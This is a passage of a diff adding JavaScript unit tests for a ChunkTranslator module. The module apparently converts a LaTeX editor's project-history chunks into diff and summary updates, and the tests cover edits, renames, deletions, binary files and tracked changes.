v: 1, + }, + { + op: [{ d: 'foo ', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + ]) + done() + } + ) + }) + + it('should return the correct initial text if there are previous changes', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 2, + 3, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal( + 'Hello foo test, world, this is a test' + ) + expect(updates).to.deep.equal([ + { + op: [{ d: 'foo ', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + ]) + done() + } + ) + }) + + it('should return the correct initial text in case of file restore', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 3, + 5, + (error, param) => { + const { initialContent } = param + expect(error).to.be.null + expect(initialContent).to.equal('Hello world, this is a test') + done() + } + ) + }) + + it('should still find original file in case it was renamed', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 5, + 6, + (error, param) => { + const { initialContent } = param + expect(error).to.be.null + expect(initialContent).to.equal('Hello world, this is a test') + done() + } + ) + }) + }) + + describe('convertToSummarizedUpdates', function () { + it('should return a summary of which docs changes when', function (done) { + const assertion = (error, updates) => { + expect(error).to.be.null + + expect(updates).to.deep.equal([ + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + pathnames: [], + project_ops: [ + { + remove: { + pathname: 'main.tex', + }, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + origin: { + kind: 'file-restore', + version: 1, + path: 'main.tex', + timestamp: this.date.toISOString(), + }, + }, + v: 3, + }, + { + pathnames: [], + project_ops: [ + { + add: { + pathname: 'main.tex', + }, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + origin: { + kind: 'file-restore', + version: 1, + path: 'main.tex', + timestamp: this.date.toISOString(), + }, + }, + v: 4, + }, + { + pathnames: [], + project_ops: [ + { + rename: { + pathname: 'main.tex', + newPathname: 'main2.tex', + }, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 5, + }, + ]) + done() + } + + this.ChunkTranslator.convertToSummarizedUpdates(this.chunk, assertion) + }) + }) + }) + + describe('with a sequence of inserts and deletes', function () { + beforeEach(function () { + this.fileHash = 'some_other_hash' + this.initialFileContents = 'aa bbbbb ccc ' + this.HistoryStoreManager.getProjectBlob + .withArgs(this.historyId, this.fileHash) + .yields(null, this.initialFileContents) + + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + '111 ', // -> "111 aa bbbbb ccc " + -3, // -> "111 bbbbb ccc " + 6, // -> "111 bbbbb ccc " + '2222 ', // -> "111 bbbbb 2222 ccc " + -1, // -> "111 bbbbb 2222 cc " + 'd', // -> "111 bbbbb 2222 dcc " + 3, + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + }) + + describe('convertToDiffUpdates', function () { + it('should convert them to insert and delete ops', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.initialFileContents) + expect(updates).to.deep.equal([ + { + op: [ + { i: '111 ', p: 0 }, + { d: 'aa ', p: 4 }, + // NOTE: The construction of TextOperation can merge an + // insertion across a deletion operation, which is why this is + // ever so slightly different from the textOperation defined + // in the chunk. Both diffs represent the same change in + // content. + { i: '2222 d', p: 10 }, + { d: 'c', p: 16 }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('should apply them to the text correctly', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 1, + 1, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal('111 bbbbb 2222 dcc ') + expect(updates).to.deep.equal([]) + done() + } + ) + }) + }) + }) + + describe('with unknown operations', function (done) { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [{ unknown: true }], + timestamp: this.date.toISOString(), + authors: [this.author1.id, undefined], + }, + { + operations: [ + { pathname: 'main.tex', textOperation: [3, 'Hello world'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id, undefined], + }, + ], + }, + }, + authors: [this.author1.id], + } + }) + + describe('convertToDiffUpdates', function () { + it('should ignore the unknown update', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 2, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'Hello world', p: 3 }], + meta: { + users: [this.author1.id, null], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + ]) + done() + } + ) + }) + }) + + describe('convertToSummarizedUpdates', function () { + it('should ignore the unknown update', function (done) { + const assertion = (error, updates) => { + expect(error).to.be.null + expect(updates).to.deep.equal([ + { + pathnames: [], + project_ops: [], + meta: { + users: [this.author1.id, null], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id, null], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + ]) + done() + } + + this.ChunkTranslator.convertToSummarizedUpdates(this.chunk, assertion) + }) + }) + }) + + describe('with changes to multiple files', function (done) { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + 'other.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { pathname: 'other.tex', textOperation: [0, 'foo'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'main.tex', textOperation: [6, 'bar'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'other.tex', textOperation: [9, 'baz'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'main.tex', textOperation: [12, 'qux'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + }) + + describe('convertToDiffUpdates', function () { + it('should only return the changes to the requested file', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 4, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal('Hello world, this is a test') + expect(updates).to.deep.equal([ + { + op: [{ i: 'bar', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + { + op: [{ i: 'qux', p: 12 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + ]) + done() + } + ) + }) + }) + + describe('convertToSummarizedUpdates', function () { + it('should return a summary of which docs changes when', function (done) { + const assertion = (error, updates) => { + expect(error).to.be.null + expect(updates).to.deep.equal([ + { + pathnames: ['other.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + { + pathnames: ['other.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + ]) + done() + } + + this.ChunkTranslator.convertToSummarizedUpdates(this.chunk, assertion) + }) + }) + }) + + describe('when the file is created during the chunk', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { pathname: 'main.tex', textOperation: [6, 'bar'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { + pathname: 'new.tex', + file: { hash: this.fileHash, stringLength: 10 }, + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'new.tex', textOperation: [6, 'bar'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'new.tex', textOperation: [9, 'baz'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1], + } + }) + + describe('convertToDiffUpdates', function () { + it('returns changes after the file was created before the fromVersion', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'new.tex', + 2, + 4, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'bar', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + op: [{ i: 'baz', p: 9 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + ]) + done() + } + ) + }) + + it('returns changes when the file was created at the fromVersion', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'new.tex', + 1, + 4, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'bar', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + op: [{ i: 'baz', p: 9 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + ]) + done() + } + ) + }) + + it('returns changes when the file was created after the fromVersion', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'new.tex', + 0, + 4, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'bar', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + op: [{ i: 'baz', p: 9 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + ]) + done() + } + ) + }) + }) + + describe('convertToSummarizedUpdates', function () { + it('should return a summary which includes the addition', function (done) { + const assertion = (error, updates) => { + expect(error).to.be.null + expect(updates).to.deep.equal([ + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + pathnames: [], + project_ops: [ + { + add: { + pathname: 'new.tex', + }, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + { + pathnames: ['new.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + pathnames: ['new.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + ]) + done() + } + + this.ChunkTranslator.convertToSummarizedUpdates(this.chunk, assertion) + }) + }) + }) + + describe('when the file is renamed during the chunk', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [{ pathname: 'main.tex', textOperation: ['foo'] }], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'main.tex', newPathname: 'moved.tex' }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'moved.tex', textOperation: [3, 'bar'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'moved.tex', newPathname: 'moved_again.tex' }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [ + { pathname: 'moved_again.tex', textOperation: [6, 'baz'] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1], + } + }) + + describe('convertToDiffUpdates', function () { + it('uses the original pathname before it is moved', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 5, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'foo', p: 0 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + op: [{ i: 'bar', p: 3 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + op: [{ i: 'baz', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 4, + }, + ]) + done() + } + ) + }) + + it('uses the original pathname for before the move change', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 1, + 5, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal('foo' + this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'bar', p: 3 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + op: [{ i: 'baz', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 4, + }, + ]) + done() + } + ) + }) + + it('uses the new pathname for after the move change', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'moved.tex', + 2, + 5, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal('foo' + this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'bar', p: 3 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + op: [{ i: 'baz', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 4, + }, + ]) + done() + } + ) + }) + + it('tracks multiple renames', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'moved_again.tex', + 4, + 5, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal('foobar' + this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'baz', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 4, + }, + ]) + done() + } + ) + }) + + it('returns an error when referring to a file that is now moved', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 4, + 5, + error => { + expect(error.message).to.equal( + "pathname 'main.tex' not found in range" + ) + done() + } + ) + }) + }) + + describe('convertToSummarizedUpdates', function () { + it('should return a summary which includes the rename', function (done) { + const assertion = (error, updates) => { + expect(error).to.be.null + expect(updates).to.deep.equal([ + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + pathnames: [], + project_ops: [ + { + rename: { + pathname: 'main.tex', + newPathname: 'moved.tex', + }, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + { + pathnames: ['moved.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + { + pathnames: [], + project_ops: [ + { + rename: { + pathname: 'moved.tex', + newPathname: 'moved_again.tex', + }, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 3, + }, + { + pathnames: ['moved_again.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 4, + }, + ]) + done() + } + + this.ChunkTranslator.convertToSummarizedUpdates(this.chunk, assertion) + }) + }) + }) + + describe('when the file is deleted during the chunk', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + 'other.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [{ pathname: 'main.tex', textOperation: ['foo'] }], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [{ pathname: 'main.tex', newPathname: '' }], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [{ pathname: 'other.tex', textOperation: ['foo'] }], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1], + } + }) + + describe('convertToDiffUpdates', function () { + it('returns updates up to when it is deleted', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 3, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.fileContents) + expect(updates).to.deep.equal([ + { + op: [{ i: 'foo', p: 0 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + + it('returns nothing if fromVersion is when is it was deleted', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 1, + 3, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal('foo' + this.fileContents) + expect(updates).to.deep.equal([]) + done() + } + ) + }) + + it('returns an error requesting changes after deleted', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 2, + 3, + error => { + expect(error.message).to.equal( + "pathname 'main.tex' not found in range" + ) + done() + } + ) + }) + }) + + describe('convertToSummarizedUpdates', function () { + it('should return a summary which includes the delete', function (done) { + const assertion = (error, updates) => { + expect(error).to.be.null + expect(updates).to.deep.equal([ + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + pathnames: [], + project_ops: [ + { + remove: { + pathname: 'main.tex', + }, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + { + pathnames: ['other.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 2, + }, + ]) + done() + } + + this.ChunkTranslator.convertToSummarizedUpdates(this.chunk, assertion) + }) + }) + }) + + describe("with text operations applied to files that don't exist", function (done) { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'not_here.tex', + textOperation: [3, 'Hello world'], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id, undefined], + }, + ], + }, + }, + authors: [this.author1], + } + }) + + describe('convertToSummarizedUpdates', function () { + it('should return an empty diff instead of an error', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'not_here.tex', + 0, + 1, + (error, result) => { + expect(error).to.equal(null) + expect(result.updates.length).to.equal(0) + done() + } + ) + }) + }) + }) + + describe("with rename operations applied to files that don't exist", function (done) { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { pathname: 'not_here.tex', newPathname: 'blah.tex' }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id, undefined], + }, + ], + }, + }, + authors: [this.author1], + } + }) + + describe('convertToSummarizedUpdates', function () { + it('should return an empty diff instead of an error', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'not_here.tex', + 0, + 1, + (error, result) => { + expect(error).to.equal(null) + expect(result.updates.length).to.equal(0) + done() + } + ) + }) + }) + }) + + describe("with remove operations applied to files that don't exist", function (done) { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [{ pathname: 'not_here.tex', newPathname: '' }], + timestamp: this.date.toISOString(), + authors: [this.author1.id, undefined], + }, + ], + }, + }, + authors: [this.author1], + } + }) + + describe('convertToSummarizedUpdates', function () { + it('should return an empty diff instead of an error', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'not_here.tex', + 0, + 1, + (error, result) => { + expect(error).to.equal(null) + expect(result.updates.length).to.equal(0) + done() + } + ) + }) + }) + }) + + describe('with multiple operations in one change', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + 'other.tex': { + hash: this.fileHash, + stringLength: 42, + }, + 'old.tex': { + hash: this.fileHash, + stringLength: 42, + }, + 'deleted.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + + changes: [ + { + operations: [ + { pathname: 'main.tex', textOperation: ['Hello test, ', -6] }, + { pathname: 'main.tex', textOperation: [6, 'foo '] }, + { pathname: 'other.tex', textOperation: [6, 'foo '] }, + { pathname: 'old.tex', newPathname: 'new.tex' }, + { pathname: 'deleted.tex', newPathname: '' }, + { + pathname: 'created.tex', + file: { hash: this.fileHash, stringLength: 10 }, + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + { + operations: [{ pathname: 'main.tex', textOperation: [6, -4] }], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1], + } + }) + + describe('convertToDiffUpdates', function () { + it('should can return multiple ops from the same version', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 2, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal(this.fileContents) + expect(updates).to.deep.equal([ + { + op: [ + { i: 'Hello test, ', p: 0 }, + { d: 'Hello ', p: 12 }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + op: [{ i: 'foo ', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + op: [{ d: 'foo ', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + ]) + done() + } + ) + }) + + it('should return the correct initial text if there are previous changes', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 1, + 2, + (error, param) => { + if (param == null) { + param = {} + } + const { initialContent, updates } = param + expect(error).to.be.null + expect(initialContent).to.equal( + 'Hello foo test, world, this is a test' + ) + expect(updates).to.deep.equal([ + { + op: [{ d: 'foo ', p: 6 }], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + ]) + done() + } + ) + }) + }) + + describe('convertToSummarizedUpdates', function () { + it('should return a summary of containing multiple changes', function (done) { + const assertion = (error, updates) => { + expect(error).to.be.null + expect(updates).to.deep.equal([ + { + pathnames: ['main.tex', 'other.tex'], + project_ops: [ + { + rename: { + pathname: 'old.tex', + newPathname: 'new.tex', + }, + }, + { + remove: { + pathname: 'deleted.tex', + }, + }, + { + add: { + pathname: 'created.tex', + }, + }, + ], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.author1.id], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 1, + }, + ]) + done() + } + + this.ChunkTranslator.convertToSummarizedUpdates(this.chunk, assertion) + }) + }) + }) + + describe('with a binary file', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + 'binary.tex': { + hash: this.fileHash, + byteLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { pathname: 'main.tex', textOperation: ['Hello test, ', -6] }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + }) + + describe('convertToDiffUpdates', function () { + it('should convert them to a binary diff', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'binary.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff).to.deep.equal({ binary: true }) + done() + } + ) + }) + }) + }) + + describe('with v2 author ids', function () { + beforeEach(function () { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { pathname: 'main.tex', textOperation: ['Hello test, ', -6] }, + ], + timestamp: this.date.toISOString(), + v2Authors: [(this.v2AuthorId = '123456789')], + }, + ], + }, + }, + } + }) + + describe('convertToDiffUpdates', function () { + it('should return the v2 author id in the users array', function (done) { + this.ChunkTranslator.convertToDiffUpdates( + this.projectId, + this.chunk, + 'main.tex', + 0, + 1, + (error, diff) => { + expect(error).to.be.null + expect(diff.updates).to.deep.equal([ + { + op: [ + { i: 'Hello test, ', p: 0 }, + { d: 'Hello ', p: 12 }, + ], + meta: { + users: [this.v2AuthorId], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + ) + }) + }) + + describe('convertToSummarizedUpdates', function () { + it('should return the v2 author id in the users array', function (done) { + const assertion = (error, updateSet) => { + expect(error).to.be.null + expect(updateSet).to.deep.equal([ + { + pathnames: ['main.tex'], + project_ops: [], + meta: { + users: [this.v2AuthorId], + start_ts: this.date.getTime(), + end_ts: this.date.getTime(), + }, + v: 0, + }, + ]) + done() + } + this.ChunkTranslator.convertToSummarizedUpdates(this.chunk, assertion) + }) + }) + }) + + describe('with tracked changes in a file', function () { + describe('convertToDiffUpdates', function () { + beforeEach(function () { + this.rangesHash = 'some_ranges_hash' + this.fileContents = 'Hello planet world, this is a test' + this.ranges = JSON.stringify({ + trackedChanges: [ + { + range: { pos: 6, length: 7 }, + tracking: { + type: 'delete', + userId: this.author1.id, + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ], + }) + this.HistoryStoreManager.getProjectBlob + .withArgs(this.historyId, this.rangesHash) + .yields(null, this.ranges) + this.HistoryStoreManager.getProjectBlob + .withArgs(this.historyId, this.fileHash) + .yields(null, this.fileContents) + }) + + it('should filter out the tracked deletes that were present in the chunk', function (done) { + this.chunk = { + chunk: { + startVersion: 0, + history: { + snapshot: { + files: { + 'main.tex': { + hash: this.fileHash, + rangesHash: this.rangesHash, + stringLength: 42, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [ + // [...] is a tracked delete + 28, // Hello [planet ]world, this is |a test + -1, // Hello [planet ]world, this is | test + 'the', // Hello [planet ]world, this is the| test + 5, // Hello [planet ]world, this is the test| + ], + }, + ], + timestamp: this.date.toISOString(), + authors: [this.author1.id], + }, + ], + }, + }, + authors: [this.author1.id], + } + + this.ChunkTranslator.convertToDiffUpdates( 